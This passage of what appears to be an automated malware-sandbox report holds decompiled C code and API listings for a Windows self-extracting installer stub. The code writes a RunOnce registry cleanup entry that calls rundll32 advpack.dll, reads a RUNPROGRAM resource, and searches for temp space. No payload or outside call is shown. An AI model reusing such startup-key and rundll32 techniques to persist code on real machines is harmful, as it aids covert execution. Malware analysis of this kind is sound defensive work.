                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: 6b35ebe9f8219ca2fdeed720c17178ab4680aad7a651232e2ece6ded1f121adc
                                                                                                                                                                                                                                                • Instruction ID: a31fb94a354ae22d3e4aef464ab467008f4577e602834df29bfb9a0dd4dce759
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b35ebe9f8219ca2fdeed720c17178ab4680aad7a651232e2ece6ded1f121adc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96316C32604744ABC320EBA4CC8DAEB73A8AF94305F44492DF5D5C62D0EBF899498792
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E00102BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				signed char _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t4 = GetVersion();
                                                                                                                                                                                                                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t17 = _t21;
                                                                                                                                                                                                                                                							 *0x10a288(0, 1, 0, 0);
                                                                                                                                                                                                                                                							 *_t21();
                                                                                                                                                                                                                                                							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                                							if(_t24 != _t24) {
                                                                                                                                                                                                                                                								_t17 = 4;
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t20 = _a12;
                                                                                                                                                                                                                                                				_t18 = _a4;
                                                                                                                                                                                                                                                				 *0x109124 = 0;
                                                                                                                                                                                                                                                				if(E00102CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                                					_t9 = E00102F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                                					_t22 = _t9; // executed
                                                                                                                                                                                                                                                					E001052B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                                					if(_t22 != 0) {
                                                                                                                                                                                                                                                						_t32 =  *0x108a3a; // 0x0
                                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                                							_t19 =  *0x109a2c; // 0x0
                                                                                                                                                                                                                                                							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                								E00101F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t6 =  *0x108588; // 0x0
                                                                                                                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                                                                                                                					CloseHandle(_t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 =  *0x109124; // 0x80070002
                                                                                                                                                                                                                                                				return _t7;
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00106BB0,00100000,00000000,00000002,0000000A), ref: 00102C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00106BB0,00100000,00000000,00000002,0000000A), ref: 00102C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00102C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00106BB0,00100000,00000000,00000002,0000000A), ref: 00102C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                • Opcode ID: 85123c320c5d88d57f5cbef786e6c941e1f0880a64931e1304674461f91bbc29
                                                                                                                                                                                                                                                • Instruction ID: 7d95df1c6c00a16b186c1e57b35a469a3e3846b0d4a72783dc2d4b8c35b808ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85123c320c5d88d57f5cbef786e6c941e1f0880a64931e1304674461f91bbc29
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A11E171300316ABE7206BB4AE9CA6F37699F883A0B444025F9C0E36D1DBF0DCC1C661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00106F40() {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(E00106EF0); // executed
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                                0x00106f45
                                                                                                                                                                                                                                                0x00106f4d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00106F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                • Opcode ID: 261548394a1c2cebd065648e4953fd28d53848255cdeaab1156c35503c0491dd
                                                                                                                                                                                                                                                • Instruction ID: 7aa233115b4244bbf582798698f70424394a378d7daa6c119e888db617dabd34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 261548394a1c2cebd065648e4953fd28d53848255cdeaab1156c35503c0491dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9290027425130047D6105B70DD1941979A16F4D602BC15460A091C48D5DBF040905552
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0010202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v528;
                                                                                                                                                                                                                                                				void* _v532;
                                                                                                                                                                                                                                                				int _v536;
                                                                                                                                                                                                                                                				int _v540;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                                				void _t56;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				intOrPtr* _t81;
                                                                                                                                                                                                                                                				void* _t86;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t90;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                                                                				void* _t94;
                                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t79 = __edx;
                                                                                                                                                                                                                                                				_t28 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                                				_t84 = 0x104;
                                                                                                                                                                                                                                                				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                                				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                                				_t66 = 0;
                                                                                                                                                                                                                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					L24:
                                                                                                                                                                                                                                                					return E00106CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(_t86);
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E0010171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                                					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t87 = _t87 + 1;
                                                                                                                                                                                                                                                					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                                					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                                					_t79 = _t84;
                                                                                                                                                                                                                                                					E0010658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                                					_t84 = _t46;
                                                                                                                                                                                                                                                					if(_t84 == 0) {
                                                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                                                						if(GetModuleFileNameA( *0x109a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                							L17:
                                                                                                                                                                                                                                                							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							_pop(_t86);
                                                                                                                                                                                                                                                							goto L24;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						_t72 =  &_v268;
                                                                                                                                                                                                                                                						_t80 = _t72 + 1;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t49 =  *_t72;
                                                                                                                                                                                                                                                							_t72 = _t72 + 1;
                                                                                                                                                                                                                                                						} while (_t49 != 0);
                                                                                                                                                                                                                                                						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                                						_t81 = 0x1091e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t50 =  *_t81;
                                                                                                                                                                                                                                                							_t81 = _t81 + 1;
                                                                                                                                                                                                                                                						} while (_t50 != 0);
                                                                                                                                                                                                                                                						_t84 = _t73 + 0x50 + _t81 - 0x1091e5;
                                                                                                                                                                                                                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1091e5);
                                                                                                                                                                                                                                                						if(_t90 != 0) {
                                                                                                                                                                                                                                                							 *0x108580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                                							E0010171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                                							_t75 = _t90;
                                                                                                                                                                                                                                                							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                                							_t79 = _t23;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t56 =  *_t75;
                                                                                                                                                                                                                                                								_t75 = _t75 + 1;
                                                                                                                                                                                                                                                							} while (_t56 != 0);
                                                                                                                                                                                                                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                                							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                                							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                                							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t79 = 0x4b5;
                                                                                                                                                                                                                                                						E001044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                                					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                                					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                                					if(_t91 == 0) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                						E0010658A( &_v268, 0x104, 0x101140);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                				 *0x108530 = _t66;
                                                                                                                                                                                                                                                				goto L23;
                                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102050
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0010205F
                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0010208C
                                                                                                                                                                                                                                                  • Part of subcall function 0010171E: _vsnprintf.MSVCRT ref: 00101750
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001020C9
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001020EA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00102103
                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102122
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00102134
                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102144
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0010215B
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0010218C
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001021C1
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001021E4
                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0010223D
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102249
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102250
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 232 1055a0-1055d9 call 10468f LocalAlloc 235 1055db-1055f1 call 1044b9 call 106285 232->235 236 1055fd-10560c call 10468f 232->236 248 1055f6-1055f8 235->248 242 105632-105643 lstrcmpA 236->242 243 10560e-105630 call 1044b9 LocalFree 236->243 246 105645 242->246 247 10564b-105659 LocalFree 242->247 243->248 246->247 250 105696-10569c 247->250 251 10565b-10565d 247->251 252 1058b7-1058c7 call 106ce0 248->252 253 1056a2-1056a8 250->253 254 10589f-1058b5 call 106517 250->254 255 105669 251->255 256 10565f-105667 251->256 253->254 259 1056ae-1056c1 GetTempPathA 253->259 254->252 260 10566b-10567a call 105467 255->260 256->255 256->260 264 1056f3-105711 call 101781 259->264 265 1056c3-1056c9 call 105467 259->265 269 105680-105691 call 1044b9 260->269 270 10589b-10589d 260->270 274 105717-105729 GetDriveTypeA 264->274 275 10586c-105890 GetWindowsDirectoryA call 10597d 264->275 272 1056ce-1056d0 265->272 269->248 270->252 272->270 276 1056d6-1056df call 102630 272->276 278 105730-105740 GetFileAttributesA 274->278 279 10572b-10572e 274->279 275->264 289 105896 275->289 276->264 290 1056e1-1056ed call 105467 276->290 282 105742-105745 278->282 283 10577e-10578f call 10597d 278->283 279->278 279->282 287 105747-10574f 282->287 288 10576b 282->288 297 105791-10579e call 102630 283->297 298 1057b2-1057bf call 102630 283->298 292 105771-105779 287->292 293 105751-105753 287->293 288->292 289->270 290->264 290->270 295 105864-105866 292->295 293->292 299 105755-105762 call 106952 293->299 295->274 295->275 297->288 306 1057a0-1057b0 call 10597d 297->306 307 1057c1-1057cd GetWindowsDirectoryA 298->307 308 1057d3-1057f8 call 10658a GetFileAttributesA 298->308 299->288 309 105764-105769 299->309 306->288 306->298 307->308 314 
10580a 308->314 315 1057fa-105808 CreateDirectoryA 308->315 309->283 309->288 316 10580d-10580f 314->316 315->316 317 105811-105825 316->317 318 105827-10585c SetFileAttributesA call 101781 call 105467 316->318 317->295 318->270 323 10585e 318->323 323->295
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E001055A0(void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v265;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                				int _t32;
                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                				int _t35;
                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                				signed int _t38;
                                                                                                                                                                                                                                                				int _t40;
                                                                                                                                                                                                                                                				int _t44;
                                                                                                                                                                                                                                                				long _t48;
                                                                                                                                                                                                                                                				int _t49;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                				int _t54;
                                                                                                                                                                                                                                                				int _t59;
                                                                                                                                                                                                                                                				char _t60;
                                                                                                                                                                                                                                                				int _t65;
                                                                                                                                                                                                                                                				char _t66;
                                                                                                                                                                                                                                                				int _t67;
                                                                                                                                                                                                                                                				int _t68;
                                                                                                                                                                                                                                                				int _t69;
                                                                                                                                                                                                                                                				int _t70;
                                                                                                                                                                                                                                                				int _t71;
                                                                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                                				int _t73;
                                                                                                                                                                                                                                                				CHAR* _t82;
                                                                                                                                                                                                                                                				CHAR* _t88;
                                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t28 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                                				_t2 = E0010468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                                				if(_t109 != 0) {
                                                                                                                                                                                                                                                					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                                					_t32 = E0010468F(_t82, _t109, 1);
                                                                                                                                                                                                                                                					__eflags = _t32;
                                                                                                                                                                                                                                                					if(_t32 != 0) {
                                                                                                                                                                                                                                                						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                                						__eflags = _t33;
                                                                                                                                                                                                                                                						if(_t33 == 0) {
                                                                                                                                                                                                                                                							 *0x109a30 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						LocalFree(_t109);
                                                                                                                                                                                                                                                						_t35 =  *0x108b3e; // 0x0
                                                                                                                                                                                                                                                						__eflags = _t35;
                                                                                                                                                                                                                                                						if(_t35 == 0) {
                                                                                                                                                                                                                                                							__eflags =  *0x108a24; // 0x0
                                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                                								L46:
                                                                                                                                                                                                                                                								_t101 = 0x7d2;
                                                                                                                                                                                                                                                								_t36 = E00106517(_t82, 0x7d2, 0, E00103210, 0, 0);
                                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                                								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								__eflags =  *0x109a30; // 0x0
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									goto L46;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t109 = 0x1091e4;
                                                                                                                                                                                                                                                									_t40 = GetTempPathA(0x104, 0x1091e4);
                                                                                                                                                                                                                                                									__eflags = _t40;
                                                                                                                                                                                                                                                									if(_t40 == 0) {
                                                                                                                                                                                                                                                										L19:
                                                                                                                                                                                                                                                										_push(_t82);
                                                                                                                                                                                                                                                										E00101781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                                										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                                										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                                											do {
                                                                                                                                                                                                                                                												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                                												__eflags = _t109 - 6;
                                                                                                                                                                                                                                                												if(_t109 == 6) {
                                                                                                                                                                                                                                                													L22:
                                                                                                                                                                                                                                                													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                                													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                                														goto L30;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L23;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													__eflags = _t109 - 3;
                                                                                                                                                                                                                                                													if(_t109 != 3) {
                                                                                                                                                                                                                                                														L23:
                                                                                                                                                                                                                                                														__eflags = _t109 - 2;
                                                                                                                                                                                                                                                														if(_t109 != 2) {
                                                                                                                                                                                                                                                															L28:
                                                                                                                                                                                                                                                															_t66 = _v268;
                                                                                                                                                                                                                                                															goto L29;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t66 = _v268;
                                                                                                                                                                                                                                                															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                                															if(_t66 == 0x41) {
                                                                                                                                                                                                                                                																L29:
                                                                                                                                                                                                                                                																_t60 = _t66 + 1;
                                                                                                                                                                                                                                                																_v268 = _t60;
                                                                                                                                                                                                                                                																goto L42;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                                																if(_t66 == 0x42) {
                                                                                                                                                                                                                                                																	goto L29;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t68 = E00106952( &_v268);
                                                                                                                                                                                                                                                																	__eflags = _t68;
                                                                                                                                                                                                                                                																	if(_t68 == 0) {
                                                                                                                                                                                                                                                																		goto L28;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                                																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                                																			L30:
                                                                                                                                                                                                                                                																			_push(0);
                                                                                                                                                                                                                                                																			_t103 = 3;
                                                                                                                                                                                                                                                																			_t49 = E0010597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                                																			__eflags = _t49;
                                                                                                                                                                                                                                                																			if(_t49 != 0) {
                                                                                                                                                                                                                                                																				L33:
                                                                                                                                                                                                                                                																				_t50 = E00102630(0,  &_v268, 1);
                                                                                                                                                                                                                                                																				__eflags = _t50;
                                                                                                                                                                                                                                                																				if(_t50 != 0) {
                                                                                                                                                                                                                                                																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                                																				}
